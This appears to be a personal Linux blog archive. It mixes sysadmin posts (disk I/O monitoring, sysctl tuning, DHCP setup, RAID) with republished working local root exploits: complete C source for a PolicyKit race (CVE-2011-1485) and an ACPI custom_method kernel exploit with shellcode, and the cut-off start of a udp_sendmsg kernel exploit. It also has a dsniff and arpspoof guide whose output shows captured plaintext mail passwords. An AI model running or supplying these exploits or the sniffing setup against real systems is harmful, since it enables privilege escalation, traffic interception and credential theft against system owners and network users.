Oct 06

linux local privilege escalation on polkit-1 <= 0.101

By jason Security Tools No Comments »

/* polkit-pwnage.c
*
*
* ==============================
* =      PolicyKit Pwnage      =
* =          by zx2c4          =
* =        Sept 2, 2011        =
* ==============================
*
*
* Howdy folks,
*
* This exploits CVE-2011-1485, a race condition in PolicyKit.
*
* davidz25 explains:
*
* –begin–
* Briefly, the problem is that the UID for the parent process of pkexec(1) is
* read from /proc by stat(2)’ing /proc/PID. The problem with this is that
* this returns the effective uid of the process which can easily be set to 0
* by invoking a setuid-root binary such as /usr/bin/chsh in the parent
* process of pkexec(1). Instead we are really interested in the real-user-id.
* While there’s a check in pkexec.c to avoid this problem (by comparing it to
* what we expect the uid to be – namely that of the pkexec.c process itself which
* is the uid of the parent process at pkexec-spawn-time), there is still a short
* window where an attacker can fool pkexec/polkitd into thinking that the parent
* process has uid 0 and is therefore authorized. It’s pretty hard to hit this
* window – I actually don’t know if it can be made to work in practice.
* –end–
*
* Well, here is, in fact, how it’s made to work in practice. There is as he said an
* attempted mitigation, and the way to trigger that mitigation path is something
* like this:
*
*     $ sudo -u `whoami` pkexec sh
*     User of caller (0) does not match our uid (1000)
*
* Not what we want. So the trick is to execl to a suid at just the precise moment
* /proc/PID is being stat(2)’d. We use inotify to learn exactly when it’s accessed,
* and execl to the suid binary as our very next instruction.
*
* ** Usage **
* $ pkexec –version
* pkexec version 0.101
* $ gcc polkit-pwnage.c -o pwnit
* $ ./pwnit
* [+] Configuring inotify for proper pid.
* [+] Launching pkexec.
* sh-4.2# whoami
* root
* sh-4.2# id
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
* sh-4.2#
*
* ** Targets **
* This exploit is known to work on polkit-1 <= 0.101. However, Ubuntu, which
* as of writing uses 0.101, has backported 0.102′s bug fix. A way to check
* this is by looking at the mtime of /usr/bin/pkexec — April 22, 2011 or
* later and you’re out of luck. It’s likely other distributions do the same.
* Fortunately, this exploit is clean enough that you can try it out without
* too much collateral.
*
*
* greets to djrbliss and davidz25.
*
* – zx2c4
* 2-sept-2011
*
*/
 
 
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/inotify.h>
 
int main(int argc, char **argv)
{
    printf("=============================\n");
    printf("=      PolicyKit Pwnage     =\n");
    printf("=          by zx2c4         =\n");
    printf("=        Sept 2, 2011       =\n");
    printf("=============================\n\n");
 
    if (fork()) {
        int fd;
        char pid_path[1024];
        sprintf(pid_path, "/proc/%i", getpid());
        printf("[+] Configuring inotify for proper pid.\n");
        close(0); close(1); close(2);
        fd = inotify_init();
        if (fd < 0)
            perror("[-] inotify_init");
        inotify_add_watch(fd, pid_path, IN_ACCESS);
        read(fd, NULL, 0);
        execl("/usr/bin/chsh", "chsh", NULL);
    } else {
        sleep(1);
        printf("[+] Launching pkexec.\n");
        execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL);
    }
    return 0;
}

Tagged with:
Aug 04

Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation

By jason Security Bulletin No Comments »

   This custom_method file allows to inject custom ACPI methods into the ACPI interpreter tables. This control file was introduced with world writeable permissions in Linux Kernel 2.6.33.

/*
* american-sign-language.c
*
* Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
*   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4347
*
*   This custom_method file allows to inject custom ACPI methods into the ACPI
*   interpreter tables. This control file was introduced with world writeable
*   permissions in Linux Kernel 2.6.33.
*
* Usage:
*
*   $ gcc american-sign-language.c -o american-sign-language
*   $ ./american-sign-language
*   [+] resolving required symbols…
*   [+] checking for world-writable custom_method…
*   [+] checking for an ACPI LID device…
*   [+] poisoning ACPI tables via custom_method…
*   [+] triggering ACPI payload via LID device…
*   [+] triggering exploit via futimesat…
*   [+] launching root shell!
*   # id
*   uid=0(root) gid=0(root) groups=0(root)
*
* Notes:
*
*   This vuln allows us to write custom ACPI methods and load them into the
*   kernel as an unprivileged user. We compile some fancy ASL down to AML
*   that overrides the ACPI method used when the status of the LID device is
*   queried (eg. ‘open’ or ‘closed’ lid on a laptop). When the method is
*   triggered, it overlays an OperationRegion on the physical address where
*   sys_futimesat is located and overwrites the memory via the Store to
*   escalate privileges whenever sys_futimesat is called.
*
*   The payload is 64-bit only and depends on the existence of a LID device
*   (eg. laptop), but the exploit will still tell you if you’re vulnerable
*   regardless. If you don’t know how to work around these limitations, you
*   probably shouldn’t be running this in the first place. :-P
*
*   Props to taviso, spender, kees, bliss, pipacs, twiz, stealth, and #brownpants
*/

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <inttypes.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/utsname.h>

/*
* The ASL payload looks like:
*
* DefinitionBlock ("lid.aml", "SSDT", 2, "", "", 0×00001001) {
*   Method (\_SB.LID._LID, 0, NotSerialized) {
*     OperationRegion (KMEM, SystemMemory, PHYADDR, 0×392)
*     Field(KMEM, AnyAcc, NoLock, Preserve) {
*       HACK, 0×392
*     }
*     Store (Buffer () {
*       0×55, 0×48, 0×89, 0xe5, 0×53, 0×48, 0×83, 0xec,
*       0×08, 0×48, 0xc7, 0xc3, 0×24, 0×24, 0×24, 0×24,
*       0×48, 0xc7, 0xc0, 0×24, 0×24, 0×24, 0×24, 0xbf,
*       0×00, 0×00, 0×00, 0×00, 0xff, 0xd0, 0×48, 0×89,
*       0xc7, 0xff, 0xd3, 0×48, 0xc7, 0xc0, 0xb7, 0xff,
*       0xff, 0xff, 0×48, 0×83, 0xc4, 0×08, 0x5b, 0xc9,
*       0xc3 }, HACK)
*     Return (One)
*   }
* }
*
* Feel free to `iasl -d` this is you don’t trust me! ;-)
*/
#define PAYLOAD_AML \
"\x53\x53\x44\x54\x90\x00\x00\x00\x02\x3e\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x00\x00\x49\x4e\x54\x4c" \
"\x21\x05\x09\x20\x14\x4b\x06\x5c\x2f\x03\x5f\x53\x42\x5f\x4c\x49" \
"\x44\x5f\x5f\x4c\x49\x44\x00\x5b\x80\x4b\x4d\x45\x4d\x00\x0c\xe0" \
"\x61\x17\x01\x0b\x92\x03\x5b\x81\x0c\x4b\x4d\x45\x4d\x00\x48\x41" \
"\x43\x4b\x42\x39\x70\x11\x34\x0a\x31\x55\x48\x89\xe5\x53\x48\x83" \
"\xec\x08\x48\xc7\xc3\x24\x24\x24\x24\x48\xc7\xc0\x24\x24\x24\x24" \
"\xbf\x00\x00\x00\x00\xff\xd0\x48\x89\xc7\xff\xd3\x48\xc7\xc0\xb7" \
"\xff\xff\xff\x48\x83\xc4\x08\x5b\xc9\xc3\x48\x41\x43\x4b\xa4\x01"
#define PAYLOAD_LEN 144

#define CUSTOM_METHOD "/sys/kernel/debug/acpi/custom_method"
#define HEY_ITS_A_LID "/proc/acpi/button/lid/LID/state"

unsigned long
get_symbol(char *name)
{
    FILE *f;
    unsigned long addr;
    char dummy;
    char sname[512];
    struct utsname ver;
    int ret;
    int rep = 0;
    int oldstyle = 0;
 
    f = fopen("/proc/kallsyms", "r");
    if (f == NULL) {
        f = fopen("/proc/ksyms", "r");
        if (f == NULL)
            goto fallback;
        oldstyle = 1;
    }
 
repeat:
    ret = 0;
    while(ret != EOF) {
        if (!oldstyle)
            ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
        else {
            ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
            if (ret == 2) {
                char *p;
                if (strstr(sname, "_O/") || strstr(sname, "_S."))
                    continue;
                p = strrchr(sname, ‘_’);
                if (p > ((char *)sname + 5) && !strncmp(p – 3, "smp", 3)) {
                    p = p – 4;
                    while (p > (char *)sname && *(p – 1) == ‘_’)
                        p–;
                    *p = ”;
                }
            }
        }
        if (ret == 0) {
            fscanf(f, "%s\n", sname);
            continue;
        }
        if (!strcmp(name, sname)) {
            fclose(f);
            return addr;
        }
    }
 
    fclose(f);
    if (rep)
        return 0;
fallback:
    uname(&ver);
    if (strncmp(ver.release, "2.6", 3))
        oldstyle = 1;
    sprintf(sname, "/boot/System.map-%s", ver.release);
    f = fopen(sname, "r");
    if (f == NULL)
        return 0;
    rep = 1;
    goto repeat;
}

int
main(int argc, char **argv)
{
    int ret;
    FILE *fp;
    char buf[64];
    struct stat sb;
    char payload[PAYLOAD_LEN] = PAYLOAD_AML;
    unsigned long sys_futimesat, prepare_kernel_cred, commit_creds;

    printf("[+] resolving required symbols…\n");

    sys_futimesat = get_symbol("sys_futimesat");
    if (!sys_futimesat) {
        printf("[-] sys_futimesat symbol not found, aborting!\n");
        exit(1);
    }

    prepare_kernel_cred = get_symbol("prepare_kernel_cred");
    if (!prepare_kernel_cred) {
        printf("[-] prepare_kernel_cred symbol not found, aborting!\n");
        exit(1);
    }

    commit_creds = get_symbol("commit_creds");
    if (!commit_creds) {
        printf("[-] commit_creds symbol not found, aborting!\n");
        exit(1);
    }

    printf("[+] checking for world-writable custom_method…\n");

    ret = stat(CUSTOM_METHOD, &sb);
    if (ret < 0) {
        printf("[-] custom_method not found, kernel is not vulnerable!\n");
        exit(1);
    }

    if (!(sb.st_mode & S_IWOTH)) {
        printf("[-] custom_method not world-writable, kernel is not vulnerable!\n");
        exit(1);
    }

    printf("[+] checking for an ACPI LID device…\n");

    ret = stat(HEY_ITS_A_LID, &sb);
    if (ret < 0) {
        printf("[-] ACPI LID device not found, but kernel is still vulnerable!\n");
        exit(1);
    }

    if (sizeof(sys_futimesat) != 8) {
        printf("[-] payload is 64-bit only, but kernel is still vulnerable!\n");
        exit(1);
    }

    sys_futimesat &= ~0xffffffff80000000;
    memcpy(&payload[63], &sys_futimesat, 4);
    memcpy(&payload[101], &commit_creds, 4);
    memcpy(&payload[108], &prepare_kernel_cred, 4);

    printf("[+] poisoning ACPI tables via custom_method…\n");

    fp = fopen(CUSTOM_METHOD, "w");
    fwrite(payload, 1, sizeof(payload), fp);
    fclose(fp);

    printf("[+] triggering ACPI payload via LID device…\n");

    fp = fopen(HEY_ITS_A_LID, "r");
    fread(&buf, 1, sizeof(buf), fp);
    fclose(fp);

    printf("[+] triggering exploit via futimesat…\n");

    ret = futimesat(0, "/tmp", NULL);

    if (ret != -1 || errno != EDOTDOT) {
        printf("[-] unexpected futimesat errno, exploit failed!\n");
        exit(1);
    }

    if (getuid() != 0) {
        printf("[-] privileges not escalated, exploit failed!\n");
        exit(1);
    }

    printf("[+] launching root shell!\n");
    execl("/bin/sh", "/bin/sh", NULL);
}

Tagged with:
Apr 07

sniffer tools for Centos–dsniff

By jason Security Tools No Comments »

dsniff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI.

Home Page (http://monkey.org/~dugsong/dsniff/)

INSTALL Dsniff:

1. software list

libpcap-0.7.2.tar.gz

libnet-1.0.2a.tar.gz

libnids-1.18.tar.gz

dsniff-2.3.tar.gz

2. install gcc and openssl

yum –y install openssl gcc flex bison libpcap-devel libnet

3. install libnids

# tar zxvf libnids-1.18.tar.gz
# cd libnids-1.18
# ./configure
# make
# make install

4. install  dsniff

./configure  –prefix=/usr –-without-db

make

make install

   If your Centos Version is greater 5.3 you can use yum method install it.

yum install dsniff

5. Test dsniff

dsniff –n –i eth0

Output:

04/07/11 15:00:45 tcp 192.168.1.135.3791 -> 122.55.2.222.110 (pop3)
USER hr
PASS xxx123

—————–
04/07/11 15:01:19 tcp 192.168.1.196.4747 -> 122.55.2.222.110 (pop3)
USER cx
PASS chenxia1

—————–
04/07/11 15:01:20 tcp 192.168.1.134.2086 -> 122.55.2.222.110 (pop3)
USER aa-1@xxxx.com
PASS aa-11

—————–
04/07/11 15:01:44 tcp 192.168.1.150.3630 -> 122.55.2.222.110 (pop3)
USER aa-3@xxxx.com
PASS iker-31

5.1 Test 2 (urlsnarf -n -i eth1)

Output:

urlsnarf: listening on eth1 [tcp port 80 or port 8080 or port 3128]
192.168.1.75 – - [07/Apr/2011:15:07:11 +0800] "GET http://218.60.33.7/pos?f=f4v/8/74582008.h264_1.f4v&k=2mCVf5QX4RGNvGTweGoq15snchlv5&e=89170&s=20 HTTP/1.1" – - "http://www.cntingshu.com/js/player/TudouVideoPlayer_Homer_141.swf" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.45 Safari/534.16"
192.168.1.75 – - [07/Apr/2011:15:07:12 +0800] "GET http://218.60.33.7/pos?f=f4v/8/74582008.h264_1.f4v&k=2mCVf5QX4RGNvGTweGoq15snchlv5&e=71906&s=20 HTTP/1.1" – - "http://www.cntingshu.com/js/player/TudouVideoPlayer_Homer_141.swf" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.45 Safari/534.16"
192.168.1.137 – - [07/Apr/2011:15:07:13 +0800] "GET http://safeurl.maxthon.cn/data/config.dat HTTP/1.1" – - "-" "MxAgent"
192.168.1.75 – - [07/Apr/2011:15:07:13 +0800] "GET http://218.60.33.7/pos?f=f4v/8/74582008.h264_1.f4v&k=2mCVf5QX4RGNvGTweGoq15snchlv5&e=12334&s=0 HTTP/1.1" – - "http://www.cntingshu.com/js/player/TudouVideoPlayer_Homer_141.swf" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.45 Safari/534.16"

5.3 arp proxy (switch network sniffer)

echo "1" > /proc/sys/net/ipv4/ip_forward

arpspoof -t 192.168.1.100 192.168.1.1

       Open a new terminal

dsniff –n –i eth1

Tagged with:
Jan 18

How do I view the information the process of IO to read and write on linux?

By jason Linux/Unix Oprating system No Comments »

Linux Kernel 2.6.20 kernel support for the process of more than IO statistics, can use such tools like iotop each process to monitor the situation on the IO operation, just as with the top real-time view process memory, CPU and so take the case in.  But for Linux kernel version 2.6.20 the following not so lucky, according to Stack Overflow of Replies in this way is given, VPSee Python to write a simple script that is used in linux kernel <2.6.20 the printing process under the IO condition .

Kernel < 2.6.20 Kernel <2.6.20

This idea is very simple script to redirect the results of dmesg to a file and then parse out the process once every 1 second to print the statistics IO read and write, execute this script needs root:

 

#!/usr/bin/python
# Monitoring per-process disk I/O activity
# written by Jason

import sys, os, time, signal, re

class DiskIO:
    def __init__(self, pname=None, pid=None, reads=0, writes=0):
        self.pname = pname
        self.pid = pid
        self.reads = 0
        self.writes = 0

def main():
    argc = len(sys.argv)
    if argc != 1:
        print "usage: ./iotop"
        sys.exit(0)

    if os.getuid() != 0:
        print "must be run as root"
        sys.exit(0)

    signal.signal(signal.SIGINT, signal_handler)
    os.system(‘echo 1 > /proc/sys/vm/block_dump’)
    print "TASK              PID       READ      WRITE"
    while True:
        os.system(‘dmesg -c > /tmp/diskio.log’)
        l = []
        f = open(‘/tmp/diskio.log’, ‘r’)
        line = f.readline()
        while line:
            m = re.match(\
                ‘^(\S+)\((\d+)\): (READ|WRITE) block (\d+) on (\S+)’, line)
            if m != None:
                if not l:
                    l.append(DiskIO(m.group(1), m.group(2)))
                    line = f.readline()
                    continue
                found = False
                for item in l:
                    if item.pid == m.group(2):
                        found = True
                        if m.group(3) == "READ":
                            item.reads = item.reads + 1
                        elif m.group(3) == "WRITE":
                            item.writes = item.writes + 1
                if not found:
                    l.append(DiskIO(m.group(1), m.group(2)))
            line = f.readline()
        time.sleep(1)
        for item in l:
            print "%-10s %10s %10d %10d" % \
                (item.pname, item.pid, item.reads, item.writes)

def signal_handler(signal, frame):
    os.system(‘echo 0 > /proc/sys/vm/block_dump’)
    sys.exit(0)

if __name__=="__main__":
    main()

Kernel> = 2.6.20

If you want to use IO iotop process real-time view the status of activities, then, need to download and upgrade the new kernel (2.6.20 or later).  Compile a new kernel need to open TASK_DELAY_ACCT and TASK_IO_ACCOUNTING options.  Extract the kernel into the configuration interface:

# tar jxvf linux-2.6.30.5.tar.bz2
# mv linux-2.6.30.5 /usr/src/
# cd /usr/src/linux-2.6.30.5

# make menuconfig

Select Kernel hacking -> Collect scheduler debugging info and Collect scheduler statistics, save compile the kernel after kernel:

# Make; make modules; make modules_install; make install

Modify grub, start a new kernel recognized correctly:

# Vi / boot / grub / menu.lst

Out of the new kernel outside, iotop also need to run Python 2.5 or above, so if the current Python 2.4, then you need to download and install the latest Python package.  Compile and install using the source code here:

# Tar jxvf Python-2.6.2.tar.bz2
# cd Python-2.6.2 # Cd Python-2.6.2
# ./configure
#. / Configure # make; make install
# Make; make install

Do not forget to download setuptools:

# Mv setuptools-0.6c9-py2.6.egg.sh setuptools-0.6c9-py2.6.egg # sh setuptools-0.6c9-py2.6.egg # Sh setuptools-0.6c9-py2.6.egg

More

If you want to know more about block_dump information, you can look at this process in real-time Linux IO monitoring the situation .  When using block_dump is best to turn off klogd process.

Tagged with:
Mar 08

Tunning Kernel Parameters Improving Linux Network Performance

By jason Linux/Unix Oprating system 1 Comment »

By tunning kernel parameters can improve linux socket io performance.  The settings for sysctl.conf below apply for Fedora, RedHat, Centos OS as well as other Linux flavors. These settings will improve your server network performance and some little protection against ddos attacks as well.

# Kernel sysctl configuration file for Red Hat Linux
#
# For binary values, 0 is disabled, 1 is enabled. See sysctl(8) and
# sysctl.conf(5) for more details.

# Disables packet forwarding
net.ipv4.ip_forward=0

# Disables IP source routing
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.lo.accept_source_route = 0
net.ipv4.conf.eth0.accept_source_route = 0
net.ipv4.conf.default.accept_source_route = 0

# Enable IP spoofing protection, turn on source route verification
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.lo.rp_filter = 1
net.ipv4.conf.eth0.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1

# Disable ICMP Redirect Acceptance
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.lo.accept_redirects = 0
net.ipv4.conf.eth0.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0

# Enable Log Spoofed Packets, Source Routed Packets, Redirect Packets
net.ipv4.conf.all.log_martians = 0
net.ipv4.conf.lo.log_martians = 0
net.ipv4.conf.eth0.log_martians = 0

# Disables IP source routing
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.lo.accept_source_route = 0
net.ipv4.conf.eth0.accept_source_route = 0
net.ipv4.conf.default.accept_source_route = 0

# Enable IP spoofing protection, turn on source route verification
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.lo.rp_filter = 1
net.ipv4.conf.eth0.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1

# Disable ICMP Redirect Acceptance
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.lo.accept_redirects = 0
net.ipv4.conf.eth0.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0

# Disables the magic-sysrq key
kernel.sysrq = 0

# Decrease the time default value for tcp_fin_timeout connection
net.ipv4.tcp_fin_timeout = 15

# Decrease the time default value for tcp_keepalive_time connection
net.ipv4.tcp_keepalive_time = 400

# Turn off the tcp_window_scaling
net.ipv4.tcp_window_scaling = 0

# Turn off the tcp_sack
net.ipv4.tcp_sack = 0

# Turn off the tcp_timestamps
net.ipv4.tcp_timestamps = 0

# Enable TCP SYN Cookie Protection
net.ipv4.tcp_syncookies = 1

# Lower syn retry rates
net.ipv4.tcp_synack_retries = 2
net.ipv4.tcp_syn_retries = 3

# Enable ignoring broadcasts request
net.ipv4.icmp_echo_ignore_broadcasts = 1

# Enable bad error message Protection
net.ipv4.icmp_ignore_bogus_error_responses = 1

# Log Spoofed Packets, Source Routed Packets, Redirect Packets
net.ipv4.conf.all.log_martians = 1

# Increases the size of the socket queue (effectively, q0).
net.ipv4.tcp_max_syn_backlog = 1024

# Increase the tcp-time-wait buckets pool size
net.ipv4.tcp_max_tw_buckets = 1440000

# Allowed local port range
net.ipv4.ip_local_port_range = 16384 65536

Tagged with:
Mar 07

Linux Check Disk Space with the Commands du and df

By jason Linux/Unix Oprating system 2 Comments »

To get a summary of the available and used disk space on your Linux system is to type in the df command in a terminal window. The command df stands for "disk filesystem". With the -h option (df -h) it shows the disk space in "human readable" form, which in this case means, it gives you the units along with the numbers.

The output of the df command is a table with four columns. The first column contains the file system path, which can be a reference to a hard disk or another storage device, or a file system connected through the network. The second column shows the capacity of that file system. The third column shows the available space, and the last column shows the path on which that file system is mounted. The mount point is the place in the directory tree where you can find and access the that file system.

The du command on the other hand shows the disk space used by the files and directories in the current directory. Again the -h option (df -h) makes the output easier to comprehend.

By default, the du command lists all subdirectories to show how much disk space each has occupied. This can be avoided with the -s option (df -h -s). This only shows a summary. Namely the combined disk space used by all subdirectories. If you want to show the disk usage of a directory (folder) other than the current directory, you simply put that directory name as the last argument. For example: du -h -s website, where "website" would be a subdirectory of the current directory.

Tagged with:
Mar 05

Install DHCP-SERVER in Linux Debian

By jason Linux/Unix Oprating system 2 Comments »

 

Installing  DHCP Server in debian linux is not that hard actually…

I assume you have the following configuration on your host:

2 internal nics:
eth0 (For internal  )
eth1 (for internet)

1. Setting up your eth0 for dhcp use

The most important thing you need to do is configuring static ip adresses.

I will use the following IP adress 192.168.10.x as my ip-adress range.

We type the following command: nano /etc/network/interfaces

And be sure the settings are the same as below:

auto eth0
iface eth0 inet static
address 192.168.10.1
netmask 255.255.255.0
network 192.168.10.0
broadcast 192.168.10.255

After you have modified the file press control+x you will get a confirmation telling you to save the file yes or no.. We do Y and press Enter

restart the network interface type:


/etc/init.d/networking restart

And press enter.

2. Install and configure the dhcp server

If you have completed the step above we are going to install the dhcp and configure it.

First lets install the module:

apt-get install dhcp3-server

After a while it gives a blue screen with a warning. Just press enter and let him install.

When it finished installing the server will not start. We need to bind him to a interface and give a IP range to lease.

2.1 Binding the interface

Enter the following command

nano /etc/default/dhcp3-server

Press enter

Edit the following line

INTERFACES=”"
To
INTERFACES=”eth1″

After you have modified the file press control+x you will get a confirmation telling you to save the file yes or no.. We do Y and press Enter

2.2 configuring the DHCP Release

We are at the final step and after that we have a full DHCP Server Running!

We are not going to use the default config file of the dhcp server however we are going to keep a copy of the config file.

go to the following directory:

cd /etc/dhcp3/

Make a backup copy of the following config file by typing the following command:

cp dhcpd.conf dhcpd.old.conf

And press Enter.

Now remove the file that you have backuped

rm dhcpd.conf

We make the new dhcpd.conf in this step as I promised type:

nano dhcpd.conf

Now  copy/paste the following data into the file

subnet 192.168.10.0 netmask 255.255.255.0 {
range 192.168.10.10 192.168.10.100;
option domain-name-servers 192.168.1.1;
option domain-name “Failserver.nl”;
option netbios-name-servers 192.168.10.1;
option routers 192.168.10.1;
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.10.255;
default-lease-time 86400;
max-lease-time 676800;
}

After you have modified the file press control+x you will get a confirmation telling you to save the file yes or no.. We do Y and press Enter

Now restart the DHCP3 server

/etc/init.d/dhcp3-server restart

Tagged with:
Mar 04

Linux software RAID 5 very slow

By jason Linux/Unix Oprating system 1 Comment »

Here I am going to tell about  Linux software RAID. If it’s very slow,you can test it with my way, hope it can help you.
So I had a ASUS P6T motherboard which has Intel ICH10R raid controller, 3x 1 Tb SATA 2 HDDs and Intel Core i7 920 processor. So I wanted to install Fedora 10 on that machine.
After configuring RAID 5 in the BIOS I booted the Fedora 10 installation DVD to start the installation. BUT! Suddenly I saw that Anaconda see 3 separate hard drives instead of 1 RAID device. After some googleing I figured out that my motherboard don’t have real RAID controller. Instead it is fakeraid controller. It is just software raid which software is located in BIOS. So I decided to use linux software raid, because it is definitely better than the from ASUS.
So installed Fedora 10 with linux software RAID 5 with LUKS encryption. After installation machine started to work very slowly. I thought it so because of the encryption, but after some googleing I understood that the encryption can’t slow down the machine that way. The thing was when you newly create RAID 5 array it needs to build the 3rd hard drive and it take a lot of time. It took from me approximately 4 hours to finish that operation on 1 Tb hard drives. You can check the rebuild status at any time invoking one of the following commands:

# cat /proc/mdstat

or

# mdadm --detail /dev/md0

After rebuild was over and after some tunings , I had ~90 Mb/s write and ~200 Mb/s read.

Tuning parameters was:

echo 32768 > /sys/block/md0/md/stripe_cache_size
blockdev --setra 65536 /dev/md0
Tagged with:
Feb 27

Homemade Bench top Power Supply

By jason Linux/Unix Oprating system No Comments »

I’ve always had an interest for electronics and recently I’ve been exploring my interests more. Last week I sorted through my tub of parts and placed them in individual draws. It took a good while to sort everything but I think it was worth it. I’ve seen power supplies built from PC power supplies before so I thought I’d build one my self. Thing is, I never really got around to it.

Yesterday I was feeling rather ambitious and decided to make a bench top power supply for small electronics. All the sites I found I have lost, so I kind of made it up as I went along. Most of them used ATX power supplies that are readily available, but I opted for the easy way out and used an AT with a hard on/off switch. At first this was the only reason I used it, but there are more advantages to using a AT over an ATX power supply for an external power supply. Firstly, it was cheap, well free actually. I took it from a PC that I had modified some time ago. I have a box full of AT power supplies in storage that I’ll get to some time and replace it. But I won’t be using the PC it came out of for a while, mostly because I have toaster ovens that are faster. Another reason it is better than a ATX is it has less voltages. The only voltages listed are 12v, 5v, -5v (7v) and GND. They vary in amps but are sufficient for what I will be using it for. It made it easy not to screw it up since there wasn’t many wires.

To make it was really easy. I took the top off. Drilled 4 holes in the case and inserted the insulated terminal, checking to make sure they didn’t ground out on the case. Cut most of the cables, leaving a couple of molex’s hanging out just in case I need them. I then soldered the remaining wires to a terminal by voltage (Yellow +12, Red +5, Red +/-5, Black GND.) It might not be the prettiest of them all, but I think it will do its job well.

Tagged with:
Sep 02

Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit

By jason Security Tools 2 Comments »

/***********************************************************
* hoagie_udp_sendmsg.c
* LOCAL LINUX KERNEL ROOT EXPLOIT (< 2.6.19) – CVE-2009-2698
*
* udp_sendmsg bug exploit via (*output) callback function
* used in dst_entry / rtable
*
* Bug reported by Tavis Ormandy and Julien Tinnes
* of the Google Security Team
*
* Tested with Debian Etch (r0)
*
* $ cat /etc/debian_version
* 4.0
* $ uname -a
* Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux
* $ gcc hoagie_udp_sendmsg.c -o hoagie_udp_sendmsg
* $ ./hoagie_udp_sendmsg
* hoagie_udp_sendmsg.c – linux root < 2.6.19 local
* -andi / void.at
*
* sh-3.1# id
* uid=0(root) gid=0(root) Gruppen=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(andi)
* sh-3.1#
*
* THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
* CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
* DAMAGE DONE USING THIS PROGRAM.
*
* VOID.AT Security
* andi@void.at
* http://www.void.at
*
************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/mman.h>

/**
* this code will be called from NF_HOOK via (*output) callback in kernel mode
*/
void set_current_task_uids_gids_to_zero() {
   asm("push %eax\n"
       "movl $0xffffe000, %eax\n"
       "andl %esp, %eax\n"
       "movl (%eax), %eax\n"
       "movl $0×0, 0×150(%eax)\n"
       "movl $0×0, 0×154(%eax)\n"
       "movl $0×0, 0×158(%eax)\n"
       "movl $0×0, 0x15a(%eax)\n"
       "movl $0×0, 0×160(%eax)\n"
       "movl $0×0, 0×164(%eax)\n"
       "movl $0×0, 0×168(%eax)\n"
       "movl $0×0, 0x16a(%eax)\n"
       "pop  %eax\n");
}

int main(int argc, char **argv) {
   int s;
   struct msghdr header;
   struct sockaddr_in sin;
   char *rtable = NULL;

   fprintf(stderr,
           "hoagie_udp_sendmsg.c – linux root <= 2.6.19 local\n"
                  "-andi / void.at\n\n");

   s = socket(PF_INET, SOCK_DGRAM, 0);
   if (s == -1) {
      fprintf(stderr, "[*] can’t create socket\n");
      exit(-1);
   }

   /**
    * initialize required variables
    */
   memset(&header, 0, sizeof(struct msghdr));
   memset(&sin, 0, sizeof(struct sockaddr_in));
   sin.sin_family = AF_INET;
   sin.sin_addr.s_addr = inet_addr("127.0.0.1");
   sin.sin_port = htons(22);
   header.msg_name = &sin;
   header.msg_namelen = sizeof(sin);

   /**
    * and this is the trick:
    * we can use (*output)(struct sk_buff*) from dst_entry (used by rtable) as a callback (=> offset 0×74)
    * so we map our rtable buffer at offset 0 and set output callback function
    *
    * struct dst_entry
    * {
    *         struct dst_entry        *next;
    *         atomic_t                __refcnt;       client references
    *         int                     __use;
    *         struct dst_entry        *child;
    *         struct net_device       *dev;
    *         short                   error;
    *         short                   obsolete;
    *         int                     flags;
    * #define DST_HOST                1
    * #define DST_NOXFRM              2
    * #define DST_NOPOLICY            4
    * #define DST_NOHASH              8
    * #define DST_BALANCED            0×10
    *         unsigned long           lastuse;
    *         unsigned long           expires;
    *
    *         unsigned short          header_len;     * more space at head required *
    *         unsigned short          trailer_len;    * space to reserve at tail *
    *
    *         u32                     metrics[RTAX_MAX];
    *         struct dst_entry        *path;
    *
    *         unsigned long           rate_last;      * rate limiting for ICMP *
    *         unsigned long           rate_tokens;
    *
    *         struct neighbour        *neighbour;
    *         struct hh_cache         *hh;
    *         struct xfrm_state       *xfrm;
    *
